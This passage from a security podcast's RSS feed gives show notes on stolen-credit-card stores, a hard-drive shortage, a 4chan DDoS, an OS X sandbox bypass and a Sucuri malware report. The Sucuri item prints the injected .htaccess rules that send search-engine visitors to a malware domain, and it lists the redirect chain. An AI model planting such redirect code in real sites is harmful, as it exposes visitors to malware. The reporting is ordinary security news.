<p><a href="http://blogs.rsa.com/aharoni/automated-credit-card-stores-and-the-business-of-trading-in-the-fraud-underground/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Automated CC stores</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> websites offer fraudsters an automatic way of buying stolen credit cards &ndash; simply fund an account with e-currency, choose which type of card you would like, pay and receive the full credential. Their popularity has reached such a fever pitch,</span><a href="http://blogs.rsa.com/aharoni/automated-credit-card-stores-and-the-business-of-trading-in-the-fraud-underground/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">CC store kits</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> are traded in the underground in the same fashion as phishing kits. Very few respectful vendors are without one. In a recent post on his blog, Dancho Danchev</span><a href="http://ddanchev.blogspot.com/2011/10/exposing-market-for-stolen-credit-cards.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">exposed some of the stores</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, providing a glimpse into this booming market. Recently, we&rsquo;ve encountered a new development in the underground in regards to these sites &ndash; forums opening &ldquo;official&rdquo; stores.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the old days when a fraudster was interested in selling credit cards, he had to join a forum and be formally inducted by other forum members who would vouch for him. This process required him to send a few sample cards to the forum&rsquo;s moderators, who tested the cards and wrote a review. If the fraudster passed the review, he&rsquo;d get a &ldquo;verified vendor&rdquo; status &ndash; a stamp of approval by the forum that the vendor is indeed legit. This process was put into place mainly because of the high volume of forum members that used to rip off other fraudsters, &ldquo;</span><a href="http://blogs.rsa.com/aharoni/the-fraud-underground-is-still-a-gold-mine-despite-trust-issues/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">rippers</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&rdquo; in fraudster terminology. However, when the CC store fad started, vendors moved their business out of the walled garden of the forum. While this protected the vendors from any rippers masquerading as buyers (as everything is automatic and there&rsquo;s no way a ripper can beg for free samples), it didn&rsquo;t protect the buyers. Picking up on the trend, &ldquo;rippers&rdquo; started building their own stores &ndash; fake ones &ndash; that required an initial fee to get into them. Once this fee is paid, the ruse was exposed and the ripped off buyer realized that the store never existed.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.infoworld.com/d/computer-hardware/hard-drive-shortages-will-result-in-more-expensive-pcs-says-gartner-178913"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/computer-hardware/hard-drive-shortages-will-result-in-more-expensive-pcs-says-gartner-178913</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Enterprise users and consumers who have held off buying new PCs recently may come to regret their decision as a hard-drive shortage following floods in Thailand is expected to result in higher prices, according to Gartner.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The market research company on Monday presented its survey of third-quarter PC sales in western Europe, reporting that PC shipments totaled 14.8 million units in the third quarter, an 11.4 percent decline from the same period last year.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Like elsewhere in the world, the enterprise market in western Europe is doing a bit better than the consumer market, where sales declined by almost 19 percent. However, small and mid-size companies were very reluctant when it came to upgrading their PCs, while large enterprises are doing piecemeal upgrades instead of changing all machines at once, according to Meike Escherich, principal analyst at Gartner.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While holding off upgrades may have seemed like a prudent move, in light of the current economic situation, floods in Thailand can change that. They will have a major affect on the availability of hard drives; about 50 million fewer drives will be manufactured during the fourth quarter, according to Escherich. That will result in shortages in 2012, and higher prices.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Vendors won&#39;t be able to absorb higher drive costs and will have to raise PC prices,&quot; said Escherich.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Desktops as well as low-end servers will be affected first and laptops will then follow suit.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Smaller, regional PC makers will bear the brunt of the shortages and will struggle to survive during the first half of next year, as larger vendors get preferential treatment, according to Escherich.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.thinq.co.uk/2011/11/14/4chan-hit-ddos"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thinq.co.uk/2011/11/14/4chan-hit-ddos</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Imageboard 4Chan has been down by a Distributed Denial of Service (DDoS) attack &#8211; and some fingers are pointing at the hacking group Lulzsec. The Anons, it seems, are getting a taste of their own medicine. &nbsp;The announcement came from the official</span><a href="http://twitter.com/#%21/4chan"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">4Chan twitter</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, with it also pointing users towards the</span><a href="http://status.4chan.org/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">status page</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to provide updates on the attack.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A number of posts on the site allege that hacking group Lulzsec is responsible, but there&#39;s nothing to back that up on of the group&#39;s Twitter accounts or related news sites.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IT news site</span><a href="http://techcrunch.com/2010/11/14/tumblr-4chan-war/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">TechCrunch</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> speculates that perhaps Tumblr users are responsible for the DDoSing, and reproduces a number of the image-based posts the sites are well known for, instructing users to target the opposing imageboard.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This DDoS occured just one day before anintended 4Chan attack on Tumblr, so a pre-emptive strike would make some sort of sense. Though in the world of intra-site DDoS wars there isn&#39;t a lof of that to be found.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As yet, 4Chan-spawned &#39;hacktivist&#39; collective Anonymous doesn&#39;t appear to have offered any comment &#8211; so for now, everything is speculation. &nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">4Chan is now accessible, but it&#39;s incredibly slow. It seems that the DDoS is continuing. &nbsp;</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.infoworld.com/d/security/researchers-bypass-the-restrictions-mac-os-x-default-sandbox-profiles-178914"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/security/researchers-bypass-the-restrictions-mac-os-x-default-sandbox-profiles-178914</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The restrictions imposed by Mac OS X generic application sandbox profiles can be easily bypassed, researchers from Core Security Technologies found.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple does not believe this poses a security problem, but is considering a documentation change to better communicate limitations of the sandbox profiles, the security experts said.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Mac OS X App Sandbox allows developers to restrict what their applications can do and access on a system. This is an important proactive security mechanism, because if an attacker manages to take control over a &quot;sandboxed&quot; application, through a vulnerability or otherwise, their actions would be restricted by that app&#39;s permissions.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To help developers implement this security feature more easily in their apps, Apple has provided a few default sandbox profiles. One of them is called &quot;kSBXProfileNoNetwork&quot; and as the name implies, it restricts an application&#39;s access to the local network. Another one, called &quot;kSBXProfileNoInternet,&quot; can be used to restrict access to the Internet.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security researchers from Core Security Technologies discovered that these default profiles allow Apple-script events to be sent to other applications. They created a proof-of-concept exploit that leverages this to call &quot;osascript,&quot; a scripting language interpreter built into Mac OS X, in order to spawn a separate, non-sandboxed, process.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In practical terms, if an attacker gains access over an application running under the kSBXProfileNoInternet sandbox profile, he could use osascript to launch a separate process that does have access to the Internet, therefore bypassing the restriction.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;An additional risk with these profiles is that they are supposed to provide an example of how a process should be restricted in different scenarios. If the no-network profile allows Apple-script events, this may result in new applications using the same restriction rules, therefore offering a false sense of security,&quot; the Core Security researchers said in their advisory.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company claims to have notified Apple&#39;s product security team on Sept. 20 and was told that this is not a security issue because the sandbox documentation doesn&#39;t state that Apple events will be prohibited when using this profile.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Core Security, Apple is considering modifying the documentation in order to make it clearer that restrictions enforced by a sandbox profile only apply to the processes that use it. Apple did not return a request for comment on its plans regarding this issue.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, back in 2008, security researcher Charlie Miller demonstrated a very similar attack and the company responded at the time by restricting the use of Apple events for the affected sandbox profiles.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is a simple workaround for Core Security&#39;s proof-of-concept exploit, said Paul Ducklin, the head of technology for the Asia Pacific region at antivirus firm Sophos. It involves denying access to &quot;/usr/bin/osascript&quot; when defining the sandbox for an application.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blog.sucuri.net/2011/11/htaccess-redirection-to-sweepstakesandcontestsinfo-dot-com.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog.sucuri.net/2011/11/htaccess-redirection-to-sweepstakesandcontestsinfo-dot-com.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This domain has been used to distribute malware for a while (generally through javascript injections), but only in the last few days did we start seeing it being done via .htaccess.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">* The malicious site(s) are not blacklisted by Google (or any major blacklist) at this time, so it makes spreading the malware pretty simple for the attackers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is what gets added to the .htaccess of the compromised sites:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&lt;IfModule mod_rewrite.c&gt;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RewriteEngine On</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RewriteOptions inherit</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&lt;/IfModule&gt;</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In short, anyone that visits the compromised sites from a search engine will get redirected (and some times have their personal computer compromised). This is what happens via the browser of the visitor:</span></p>
<ol>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Visits compromised site by clicking from a search engine</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Browser is redirected to sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 (and variations</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Browser is redirected to http://www4.personaltr-scaner.rr.nu/?gue5mx=i%2BrOmaqtppWomd%2FXxa.. (or www3.bustdy.in or www3.strongdefenseiz.in and variations)</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Browser is again redirected to http://rdr.cz.cc/go.php?6&amp;uid=7&amp;isRedirected=1 (and other domains)</span></li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-522-cc-underground-drive-shortage-4chan-os-x-sandbox-sweepstakesandcontestsinfo/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3130/0/infosec-daily-podcast-episode522.mp3" length="22688200" type="audio/mpeg" />
		<itunes:duration>0:00:01</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 522 for November 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan
Announcements:
	Caption Contest. Gives us your best and worst caption or P[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 522 for November 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan
Announcements:
	Caption Contest. Gives us your best and worst caption or PhotoShopped version: &#160;http://pic.twitter.com/SovbFcbE
Brad Smith (theNurse) and his stroke at Hacker Halted:
We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
You don't have a sufficient version of Flash Player to display this animation.
Stories:
	Source: http://blogs.rsa.com/aharoni/underground-forums-open-official-credit-card-stores
Automated CC stores websites offer fraudsters an automatic way of buying stolen credit cards &#8211; simply fund an account with e-currency, choose which type of card you would like, pay and receive the full credential. Their popularity has reached such a fever pitch, CC store kits are traded in the underground in the same fashion as phishing kits. Very few respectful vendors are without one. In a recent post on his blog, Dancho Danchev exposed some of the stores, providing a glimpse into this booming market. Recently, we&#8217;ve encountered a new development in the underground in regards to these sites &#8211; forums opening &#8220;official&#8221; stores.
	In the old days when a fraudster was interested in selling credit cards, he had to join a forum and be formally inducted by other forum members who would vouch for him. This process required him to send a few sample cards to the forum&#8217;s moderators, who tested the cards and wrote a review. If the fraudster passed the review, he&#8217;d get a &#8220;verified vendor&#8221; status &#8211; a stamp of approval by the forum that the vendor is indeed legit. This process was put into place mainly because of the high volume of forum members that used to rip off other fraudsters, &#8220;rippers&#8221; in fraudster terminology. However, when the CC store fad started, vendors moved their business out of the walled garden of the forum. While this protected the vendors from any rippers masquerading as buyers (as everything is automatic and there&#8217;s no way a ripper can beg for free samples), it didn&#8217;t protect the buyers. Picking up on the trend, &#8220;rippers&#8221; started building their own stores &#8211; fake ones &#8211; that required an initial fee to get into them. Once this fee is paid, the ruse was exposed and the ripped off buyer realized that the store never existed.
Source: &#160;http://www.infoworld.com/d/computer-hardware/hard-drive-shortages-will-result-in-more-expensive-pcs-says-gartner-178913
Enterprise users and consumers who have held off buying new PCs recently may come to regret their decision as a hard-drive shortage following floods in Thailand is expected to result in higher pric[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 521 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-521-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-521-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 13 Nov 2011 04:00:31 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3127</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 521 for November 12, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad. Guests: Warrax, Hackett, Spridel, and Oncee. Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.2804693245222568" style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 521 for November 12, 2011. &nbsp;Tonight&#39;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Guests: Warrax, Hackett, Spridel, and Oncee.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
